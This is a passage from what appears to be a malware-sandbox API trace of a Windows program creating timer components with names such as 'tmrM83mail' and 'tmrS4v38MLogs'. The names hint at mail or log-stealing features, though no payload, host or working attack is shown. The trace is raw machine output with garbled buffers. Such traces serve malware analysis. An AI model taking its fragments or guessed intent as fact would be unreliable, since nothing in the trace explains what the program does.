lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0281.684] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0281.684] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=6, lpWideCharStr=0x6351680, cchWideChar=6 | out: lpWideCharStr="TTimer") returned 6 [0281.684] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=10, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0281.684] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=10, lpWideCharStr=0x634a358, cchWideChar=10 | out: lpWideCharStr="tmrM83mail\x01") returned 10 [0281.684] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60d99c5, cbMultiByte=6, lpWideCharStr=0x634a35c, cchWideChar=7 | out: lpWideCharStr="TTimer") returned 6 [0281.684] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TTimer", cchCount1=6, lpString2="TTimer", cchCount2=6) returned 2 [0281.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f581, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¢4\x06çF}wÜ¢4\x06\x88½+", lpUsedDefaultChar=0x0) returned 0 [0281.684] GetClassInfoW (in: hInstance=0x5fc0000, lpClassName="TPUtilWindow", lpWndClass=0x534f680 | out: lpWndClass=0x534f680) returned 1 [0281.684] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x5fc0000, lpParam=0x0) returned 0x10124 [0281.685] SetWindowLongW (hWnd=0x10124, nIndex=-4, dwNewLong=54660934) returned 100465804 [0281.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f595, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0281.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrM83mail", cchWideChar=10, lpMultiByteStr=0x534f595, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrM83mail", lpUsedDefaultChar=0x0) returned 10 [0281.685] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0281.685] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=7, lpWideCharStr=0x634a358, cchWideChar=7 | out: lpWideCharStr="Enabledr") returned 7 [0281.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Enabled", cchWideChar=7, lpMultiByteStr=0x63601f4, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Enabled", lpUsedDefaultChar=0x0) returned 7 [0281.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="False", cchWideChar=5, lpMultiByteStr=0x634a37c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="False", lpUsedDefaultChar=0x0) returned 5 [0281.685] KillTimer (hWnd=0x10124, uIDEvent=0x1) returned 0 [0281.685] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0281.685] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=8, lpWideCharStr=0x634a318, cchWideChar=8 | out: lpWideCharStr="Intervald") returned 8 [0281.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Interval", cchWideChar=8, lpMultiByteStr=0x6366d8c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Intervalx", lpUsedDefaultChar=0x0) returned 8 [0281.685] KillTimer (hWnd=0x10124, uIDEvent=0x1) returned 0 [0281.686] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0281.686] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=7, lpWideCharStr=0x634a358, cchWideChar=7 | out: lpWideCharStr="OnTimered") returned 7 [0281.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnTimer", cchWideChar=7, lpMultiByteStr=0x6360244, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnTimer", lpUsedDefaultChar=0x0) returned 7 [0281.686] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x634a298, cbMultiByte=15, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 15 [0281.686] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x634a298, cbMultiByte=15, lpWideCharStr=0x6366d88, cchWideChar=15 | out: lpWideCharStr="tmrM83mailTimerr") returned 15 [0281.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrM83mailTimer", cchWideChar=15, lpMultiByteStr=0x534f4e5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrM83mailTimer\x0f", lpUsedDefaultChar=0x0) returned 15 [0281.686] KillTimer (hWnd=0x10124, uIDEvent=0x1) returned 0 [0281.686] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0281.686] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=4, lpWideCharStr=0x6351668, cchWideChar=4 | out: lpWideCharStr="Left汩") returned 4 [0281.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x634a35c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LeftT", lpUsedDefaultChar=0x0) returned 4 [0281.686] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0281.686] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=3, lpWideCharStr=0x6351668, cchWideChar=3 | out: lpWideCharStr="Topt汩") returned 3 [0281.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x634a31c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0281.686] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0281.686] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=6, lpWideCharStr=0x6351668, cchWideChar=6 | out: lpWideCharStr="TTimerೠص\x02") returned 6 [0281.686] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0281.686] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=9, lpWideCharStr=0x634a318, cchWideChar=9 | out: lpWideCharStr="tmrM8H1d3") returned 9 [0281.686] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60d99c5, cbMultiByte=6, lpWideCharStr=0x634a31c, cchWideChar=7 | out: lpWideCharStr="TTimer") returned 6 [0281.686] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TTimer", cchCount1=6, lpString2="TTimer", cchCount2=6) returned 2 [0281.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f581, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¢4\x06çF}wÜ¢4\x06\x88½+", lpUsedDefaultChar=0x0) returned 0 [0281.686] GetClassInfoW (in: hInstance=0x5fc0000, lpClassName="TPUtilWindow", lpWndClass=0x534f680 | out: lpWndClass=0x534f680) returned 1 [0281.686] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x5fc0000, lpParam=0x0) returned 0x10126 [0281.687] SetWindowLongW (hWnd=0x10126, nIndex=-4, dwNewLong=54660921) returned 100465804 [0281.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f595, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0281.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrM8H1d3", cchWideChar=9, lpMultiByteStr=0x534f595, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrM8H1d3", lpUsedDefaultChar=0x0) returned 9 [0281.687] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0281.687] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=7, lpWideCharStr=0x634a318, cchWideChar=7 | out: lpWideCharStr="OnTimerr") returned 7 [0281.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnTimer", cchWideChar=7, lpMultiByteStr=0x63601f4, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnTimer", lpUsedDefaultChar=0x0) returned 7 [0281.687] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x634a358, cbMultiByte=14, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0281.687] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x634a358, cbMultiByte=14, lpWideCharStr=0x63601f0, cchWideChar=14 | out: lpWideCharStr="tmrM8H1d3TimerصҰ\x02\x01") returned 14 [0281.687] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrM8H1d3Timer", cchWideChar=14, lpMultiByteStr=0x534f4e5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrM8H1d3Timer", lpUsedDefaultChar=0x0) returned 14 [0281.687] KillTimer (hWnd=0x10126, uIDEvent=0x1) returned 0 [0281.687] SetTimer (hWnd=0x10126, nIDEvent=0x1, uElapse=0x3e8, lpTimerFunc=0x0) returned 0x1 [0281.688] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0281.688] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=4, lpWideCharStr=0x6351680, cchWideChar=4 | out: lpWideCharStr="Left3") returned 4 [0281.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x634a31c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LeftT", lpUsedDefaultChar=0x0) returned 4 [0281.688] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0281.688] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=3, lpWideCharStr=0x6351680, cchWideChar=3 | out: lpWideCharStr="Topt3") returned 3 [0281.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x634a29c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0281.688] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0281.688] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=6, lpWideCharStr=0x6351680, cchWideChar=6 | out: lpWideCharStr="TTimer") returned 6 [0281.688] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x634a298, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0281.688] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x634a298, cbMultiByte=13, lpWideCharStr=0x63601f0, cchWideChar=13 | out: lpWideCharStr="tmrS4v38MLogsrصҰ\x02\x01") returned 13 [0281.688] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60d99c5, cbMultiByte=6, lpWideCharStr=0x634a29c, cchWideChar=7 | out: lpWideCharStr="TTimer") returned 6 [0281.688] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TTimer", cchCount1=6, lpString2="TTimer", cchCount2=6) returned 2 [0281.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f581, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¢4\x06çF}wÜ¢4\x06\x88½+", lpUsedDefaultChar=0x0) returned 0 [0281.688] GetClassInfoW (in: hInstance=0x5fc0000, lpClassName="TPUtilWindow", lpWndClass=0x534f680 | out: lpWndClass=0x534f680) returned 1 [0281.688] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x5fc0000, lpParam=0x0) returned 0x10128 [0281.689] SetWindowLongW (hWnd=0x10128, nIndex=-4, dwNewLong=54660908) returned 100465804 [0281.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f595, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0281.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrS4v38MLogs", cchWideChar=13, lpMultiByteStr=0x534f595, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrS4v38MLogs", lpUsedDefaultChar=0x0) returned 13 [0281.689] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0281.689] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=7, lpWideCharStr=0x634a298, cchWideChar=7 | out: lpWideCharStr="Enabledr") returned 7 [0281.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Enabled", cchWideChar=7, lpMultiByteStr=0x63601f4, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Enabled", lpUsedDefaultChar=0x0) returned 7 [0281.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="False", cchWideChar=5, lpMultiByteStr=0x634a37c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="False", lpUsedDefaultChar=0x0) returned 5 [0281.689] KillTimer (hWnd=0x10128, uIDEvent=0x1) returned 0 [0281.689] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0281.689] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=8, lpWideCharStr=0x634a358, cchWideChar=8 | out: lpWideCharStr="Intervald") returned 8 [0281.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Interval", cchWideChar=8, lpMultiByteStr=0x6366d8c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Intervalm", lpUsedDefaultChar=0x0) returned 8 [0281.689] KillTimer (hWnd=0x10128, uIDEvent=0x1) returned 0 [0281.689] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0281.689] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=7, lpWideCharStr=0x634a298, cchWideChar=7 | out: lpWideCharStr="OnTimered") returned 7 [0281.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnTimer", cchWideChar=7, lpMultiByteStr=0x636026c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnTimer", lpUsedDefaultChar=0x0) returned 7 [0281.689] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x634a318, cbMultiByte=18, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 18 [0281.689] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x634a318, cbMultiByte=18, lpWideCharStr=0x6366d88, cchWideChar=18 | out: lpWideCharStr="tmrS4v38MLogsTimer晰ضҰ\x02\x01") returned 18 [0281.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrS4v38MLogsTimer", cchWideChar=18, lpMultiByteStr=0x534f4e5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrS4v38MLogsTimer", lpUsedDefaultChar=0x0) returned 18 [0281.689] KillTimer (hWnd=0x10128, uIDEvent=0x1) returned 0 [0281.690] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0281.690] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=4, lpWideCharStr=0x6351668, cchWideChar=4 | out: lpWideCharStr="Leftp") returned 4 [0281.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x634a29c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LeftT", lpUsedDefaultChar=0x0) returned 4 [0281.690] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0281.690] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=3, lpWideCharStr=0x6351668, cchWideChar=3 | out: lpWideCharStr="Toptp") returned 3 [0281.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x634a35c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0281.690] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0281.690] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=6, lpWideCharStr=0x6351668, cchWideChar=6 | out: lpWideCharStr="TTimerೠص\x02") returned 6 [0281.690] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0281.690] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=6, lpWideCharStr=0x6351668, cchWideChar=6 | out: lpWideCharStr="tmrM8Uೠص\x02") returned 6 [0281.690] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60d99c5, cbMultiByte=6, lpWideCharStr=0x634a31c, cchWideChar=7 | out: lpWideCharStr="TTimer") returned 6 [0281.690] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TTimer", cchCount1=6, lpString2="TTimer", cchCount2=6) returned 2 [0281.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f581, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¢4\x06çF}wÜ¢4\x06\x88½+", lpUsedDefaultChar=0x0) returned 0 [0281.690] GetClassInfoW (in: hInstance=0x5fc0000, lpClassName="TPUtilWindow", lpWndClass=0x534f680 | out: lpWndClass=0x534f680) returned 1 [0281.690] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x5fc0000, lpParam=0x0) returned 0x1012a [0281.691] SetWindowLongW (hWnd=0x1012a, nIndex=-4, dwNewLong=54660895) returned 100465804 [0281.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f595, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0281.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrM8U", cchWideChar=6, lpMultiByteStr=0x534f595, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrM8U", lpUsedDefaultChar=0x0) returned 6 [0281.691] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0281.691] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=7, lpWideCharStr=0x634a318, cchWideChar=7 | out: lpWideCharStr="Enabledr") returned 7 [0281.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Enabled", cchWideChar=7, lpMultiByteStr=0x636026c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Enabled", lpUsedDefaultChar=0x0) returned 7 [0281.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="False", cchWideChar=5, lpMultiByteStr=0x634a39c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="False", lpUsedDefaultChar=0x0) returned 5 [0281.691] KillTimer (hWnd=0x1012a, uIDEvent=0x1) returned 0 [0281.691] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0281.691] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=8, lpWideCharStr=0x634a298, cchWideChar=8 | out: lpWideCharStr="Intervald") returned 8 [0281.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Interval", cchWideChar=8, lpMultiByteStr=0x6366d8c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Interval3", lpUsedDefaultChar=0x0) returned 8 [0281.691] KillTimer (hWnd=0x1012a, uIDEvent=0x1) returned 0 [0281.691] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0281.691] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=7, lpWideCharStr=0x634a318, cchWideChar=7 | out: lpWideCharStr="OnTimered") returned 7 [0281.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnTimer", cchWideChar=7, lpMultiByteStr=0x63601f4, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnTimer", lpUsedDefaultChar=0x0) returned 7 [0281.691] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0281.691] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=11, lpWideCharStr=0x63601f0, cchWideChar=11 | out: lpWideCharStr="tmrM8UTimerg") returned 11 [0281.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrM8UTimer", cchWideChar=11, lpMultiByteStr=0x534f4e5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrM8UTimer\x0b", lpUsedDefaultChar=0x0) returned 11 [0281.692] KillTimer (hWnd=0x1012a, uIDEvent=0x1) returned 0 [0281.692] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0281.692] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=4, lpWideCharStr=0x6351680, cchWideChar=4 | out: lpWideCharStr="Left敭r") returned 4 [0281.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x634a31c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LeftT", lpUsedDefaultChar=0x0) returned 4 [0281.692] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0281.692] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358538, cbMultiByte=3, lpWideCharStr=0x6351680, cchWideChar=3 | out: lpWideCharStr="Topt敭r") returned 3 [0281.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x634a29c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 